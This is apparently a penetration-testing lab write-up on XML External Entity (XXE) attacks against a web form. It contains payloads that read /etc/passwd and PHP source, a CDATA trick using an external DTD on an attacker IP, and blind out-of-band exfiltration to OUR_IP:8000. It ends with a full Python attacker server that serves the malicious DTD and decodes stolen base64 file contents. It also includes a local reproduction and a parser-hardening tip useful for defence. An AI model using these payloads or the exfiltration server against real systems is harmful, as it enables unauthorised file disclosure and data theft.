# XML External Entity (XXE)

## Basic XXE Payloads

```xml
<!-- Simple file read -->
<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]>

<!-- PHP filter: base64-encode the source so it comes back as plain character data -->
<!DOCTYPE email [<!ENTITY company SYSTEM "php://filter/convert.base64-encode/resource=connection.php">]>
```

## Basic XXE Testing

In the image below I can see that my email is reflected back to me, so I will test that parameter for XXE.

<figure><img src="https://3420091786-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fy1ZUO45eHY8aMCLJ7OiN%2Fuploads%2Fjqp841xmnGmSyDfyuMDd%2Fimage.png?alt=media&#x26;token=d3c98947-2e1a-49f0-8cbf-eb856b8ca95f" alt=""><figcaption></figcaption></figure>

Now I will test for basic XXE by declaring an external entity in the DTD and referencing it from the reflected field:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]>
<root>
<name>test</name>
<tel>1122112211</tel>
<email>&test;</email>
<message>sadadasdasdasd</message>
</root>
```

<figure><img src="https://3420091786-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fy1ZUO45eHY8aMCLJ7OiN%2Fuploads%2Fp2kK8LST5pCdVrE0gsGh%2Fimage.png?alt=media&#x26;token=f9c18830-7268-4be1-af36-b3350060664a" alt=""><figcaption></figcaption></figure>
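To see what the server side of this looks like, here is a local reproduction of the payload above. It is an added example, not code from the original write-up, and the target in the page is not known to be Python: it uses Python's expat-based `xml.sax` parser as a stand-in, a constructed passwd-style temp file instead of the real `/etc/passwd`, and a handler that returns only the text of `<email>`, the way the reflected field behaves in the screenshots. Modern Python disables external general entities by default; the vulnerable behaviour is reproduced by switching that feature on explicitly.

```python
import io
import pathlib
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges

# Constructed sample standing in for /etc/passwd (not a real file from the page).
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
)


def write_sample_file() -> str:
    """Write the constructed passwd content to a temp file, return its file:// URL."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
        fh.write(SAMPLE_PASSWD)
    return pathlib.Path(fh.name).resolve().as_uri()


def build_payload(file_url: str) -> bytes:
    """Same shape as the page's payload: external entity declared in the
    internal subset, referenced from the field the server reflects back."""
    return f"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [<!ENTITY test SYSTEM '{file_url}'>]>
<root>
<name>test</name>
<tel>1122112211</tel>
<email>&test;</email>
<message>hello</message>
</root>""".encode()


class FieldCollector(ContentHandler):
    """Collects the character data of one element, like a server that
    echoes the 'email' field back to the client."""

    def __init__(self, field: str):
        super().__init__()
        self.field, self.inside, self.chunks = field, False, []

    def startElement(self, name, attrs):
        if name == self.field:
            self.inside = True

    def endElement(self, name):
        if name == self.field:
            self.inside = False

    def characters(self, content):
        if self.inside:
            self.chunks.append(content)


def reflected_email(payload: bytes, resolve_external: bool) -> str:
    """Parse the payload and return what ends up inside <email>.
    resolve_external=True is the vulnerable configuration: the parser
    fetches the SYSTEM identifier and substitutes the file contents."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external)
    collector = FieldCollector("email")
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(payload))
    return "".join(collector.chunks)


if __name__ == "__main__":
    payload = build_payload(write_sample_file())
    print("external entities off:", repr(reflected_email(payload, False)))
    print("external entities on :", reflected_email(payload, True))
```

With the feature off the entity silently expands to nothing and the field comes back empty, which is exactly the symptom of a patched target; with it on, the file contents are reflected. For libxml2-based stacks such as lxml the equivalent hardening is `XMLParser(resolve_entities=False)`.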

## XXE PHP Filters to Read Source Code

We can now try to read source code using PHP filters. Reading a `.php` file directly through the entity usually fails, because the `<?php` tag and other markup in it are not well-formed XML once substituted into the document; the `convert.base64-encode` filter turns the file into plain text the parser accepts, and we decode it afterwards. I will try to read **connection.php**:

```xml
<!DOCTYPE email [<!ENTITY company SYSTEM "php://filter/convert.base64-encode/resource=connection.php">]>
```

<figure><img src="https://3420091786-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fy1ZUO45eHY8aMCLJ7OiN%2Fuploads%2F0RquYmjk2Gfs4ruhcEMz%2Fimage.png?alt=media&#x26;token=8f965b61-6fb3-4aa1-82f6-12a340b62bee" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3420091786-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fy1ZUO45eHY8aMCLJ7OiN%2Fuploads%2FSF2ZwOB9aPTZiJnrStlJ%2Fimage.png?alt=media&#x26;token=52ff74a1-1051-400a-ac53-926f745353e2" alt=""><figcaption></figcaption></figure>

## Advanced File Disclosure (XXE CDATA)

If the web app is not built in PHP, PHP filters cannot help us. Instead we can wrap the file in a CDATA section and read any file whose contents would otherwise break the XML parse (angle brackets, ampersands, PHP tags). Truly binary files are still a problem, since bytes that are not valid XML characters make the parser reject the document regardless of CDATA.

<figure><img src="https://3420091786-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fy1ZUO45eHY8aMCLJ7OiN%2Fuploads%2FxPyd5yzPX85d31DFqZ7F%2Fimage.png?alt=media&#x26;token=a3a80f84-d256-4b8a-ba8c-aa02716d9756" alt=""><figcaption></figcaption></figure>

**This will not work,** because the XML specification forbids parameter entity references inside markup declarations in the internal subset, so the `begin`, `file` and `end` entities cannot be joined into a new entity there. We need another way: the join has to happen in an external DTD.

So I will host a DTD on my Python server; that external DTD is where the entity joining `%begin;`, `%file;` and `%end;` is declared.

<figure><img src="https://3420091786-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fy1ZUO45eHY8aMCLJ7OiN%2Fuploads%2F0ALI7jeCtXt9K60HtF5e%2Fimage.png?alt=media&#x26;token=f5ea3219-f1f1-4571-88ab-aaaa892b72d4" alt=""><figcaption></figcaption></figure>

This payload declares the three parameter entities and then loads the DTD from my Python server, which performs the join:

```xml
<!DOCTYPE email [
  <!ENTITY % begin "<![CDATA["> <!-- prepend the beginning of the CDATA tag -->
  <!ENTITY % file SYSTEM "file:///flag.php"> <!-- reference external file -->
  <!ENTITY % end "]]>"> <!-- append the end of the CDATA tag -->
  <!ENTITY % xxe SYSTEM "http://10.10.15.163/xxe.dtd"> <!-- reference our external DTD -->
  %xxe;
]>
```

<figure><img src="https://3420091786-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fy1ZUO45eHY8aMCLJ7OiN%2Fuploads%2FjqIZXLpZNS9MSp8w5spq%2Fimage.png?alt=media&#x26;token=038a479d-eb86-4ba1-beaa-94a4a2a0f398" alt=""><figcaption></figcaption></figure>

Now I can read the file as well.

## Blind XXE (Out of Band Data Exfiltration)

Sometimes the website does not reflect the entity content back at all, so we need to make the target send the data to our own Python server instead. The external DTD below declares the file entity and a second entity whose URL embeds the (base64-encoded) file contents as a query parameter:

```xml
<!-- xxe.dtd, hosted on our server -->
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % oob "<!ENTITY content SYSTEM 'http://OUR_IP:8000/?content=%file;'>">
```

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email [ 
  <!ENTITY % remote SYSTEM "http://OUR_IP:8000/xxe.dtd">
  %remote;
  %oob;
]>
<root>&content;</root>
```

We need to host xxe.dtd on our Python server and watch its access log: the base64 appears in the `content` query parameter of the request the target makes, and we decode it locally.

<figure><img src="https://3420091786-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fy1ZUO45eHY8aMCLJ7OiN%2Fuploads%2FVmAYhtFSt05wtAEg9gfy%2Fimage.png?alt=media&#x26;token=31e181ef-a728-4499-9b5f-7fc305fc1be9" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3420091786-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fy1ZUO45eHY8aMCLJ7OiN%2Fuploads%2FrC12rzbjRdbismIc50HZ%2Fimage.png?alt=media&#x26;token=24880fb3-fd0a-4dca-b743-ffedff89f3df" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3420091786-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fy1ZUO45eHY8aMCLJ7OiN%2Fuploads%2FhdSencSxziIPpyZnS1zn%2Fimage.png?alt=media&#x26;token=4bd7991c-7737-4be1-a772-c0577b54cbc4" alt=""><figcaption></figcaption></figure>
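The two external-DTD variants on this page (the CDATA join and the blind out-of-band DTD) share the same attacker-side plumbing: generate the DTD, serve it, and read what comes back. The Python below is an added example and not code from the original write-up. It assumes the attacker host and port the page uses (`OUR_IP:8000`, the path `/xxe.dtd`) and the entity names from the payloads (`begin`, `file`, `end`, `remote`, `oob`, `content`); the name `joined` for the concatenating entity is my choice, since the page's hosted DTD is only shown as an image.

```python
import base64
import binascii
import sys
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import unquote, urlsplit

# Assumed attacker host/port, as written in the page's payloads.
LISTENER = "http://OUR_IP:8000"
DTD_URL = LISTENER + "/xxe.dtd"


def cdata_dtd() -> str:
    """Hosted DTD for the CDATA trick. The join must live in the external DTD:
    the XML spec forbids parameter-entity references inside markup declarations
    in the internal subset. 'joined' is an assumed entity name."""
    return '<!ENTITY joined "%begin;%file;%end;">\n'


def cdata_payload(dtd_url: str, target: str) -> str:
    """Request body for the CDATA technique: the file lands in <email> as a
    CDATA section, so PHP tags or angle brackets in it cannot break the parse."""
    return f"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email [
  <!ENTITY % begin "<![CDATA[">
  <!ENTITY % file SYSTEM "file://{target}">
  <!ENTITY % end "]]>">
  <!ENTITY % xxe SYSTEM "{dtd_url}">
  %xxe;
]>
<root><name>test</name><tel>1122112211</tel><email>&joined;</email><message>x</message></root>
"""


def oob_dtd(listener: str, resource: str, php: bool = True) -> str:
    """Hosted DTD for blind exfiltration. php://filter base64-encodes the file so
    newlines and URL-hostile characters survive inside the callback URL; on a
    non-PHP target (php=False) usually only short single-line files come back."""
    source = (f"php://filter/convert.base64-encode/resource={resource}"
              if php else f"file://{resource}")
    # %file; is expanded when the parser reads this DTD, so the inner
    # declaration ends up carrying the encoded file in its URL.
    return (f'<!ENTITY % file SYSTEM "{source}">\n'
            f"<!ENTITY % oob \"<!ENTITY content SYSTEM '{listener}/?content=%file;'>\">\n")


def oob_payload(dtd_url: str) -> str:
    """Request body for blind exfiltration; nothing needs to be reflected."""
    return f"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email [
  <!ENTITY % remote SYSTEM "{dtd_url}">
  %remote;
  %oob;
]>
<root>&content;</root>
"""


def decode_exfil(request_path: str):
    """Recover the exfiltrated bytes from the path the target requested, e.g.
    '/?content=cm9vdDp4...'. Returns None if there is no content parameter.
    unquote() is used instead of parse_qs() on purpose: parse_qs turns the '+'
    of base64 into a space and silently corrupts the data."""
    for part in urlsplit(request_path).query.split("&"):
        key, sep, value = part.partition("=")
        if key == "content" and sep:
            value = unquote(value).replace(" ", "+")  # undo any upstream '+' -> ' '
            value += "=" * (-len(value) % 4)          # restore padding lost in transit
            try:
                return base64.b64decode(value, validate=True)
            except binascii.Error:
                return None
    return None


class ExfilHandler(BaseHTTPRequestHandler):
    """Serves xxe.dtd to the target and decodes the callback it triggers."""
    dtd = oob_dtd(LISTENER, "/etc/passwd").encode()

    def do_GET(self):
        if urlsplit(self.path).path == "/xxe.dtd":
            self._reply(self.dtd, "application/xml-dtd")
            return
        data = decode_exfil(self.path)
        if data is not None:
            sys.stdout.write(data.decode("utf-8", "replace"))
        self._reply(b"", "text/plain")

    def _reply(self, body: bytes, ctype: str):
        self.send_response(200)
        self.send_header("Content-Type", ctype)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


if __name__ == "__main__":
    print(oob_payload(DTD_URL))  # paste as the request body, then wait for the callback
    HTTPServer(("0.0.0.0", 8000), ExfilHandler).serve_forever()
```

Run it on the attacker host with the URLs in the payload pointed at it. A plain `python3 -m http.server` also serves the DTD, but then the base64 has to be copied out of the access log and decoded by hand, which is where the `+`-to-space and missing-padding mistakes usually creep in; `decode_exfil` handles both.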
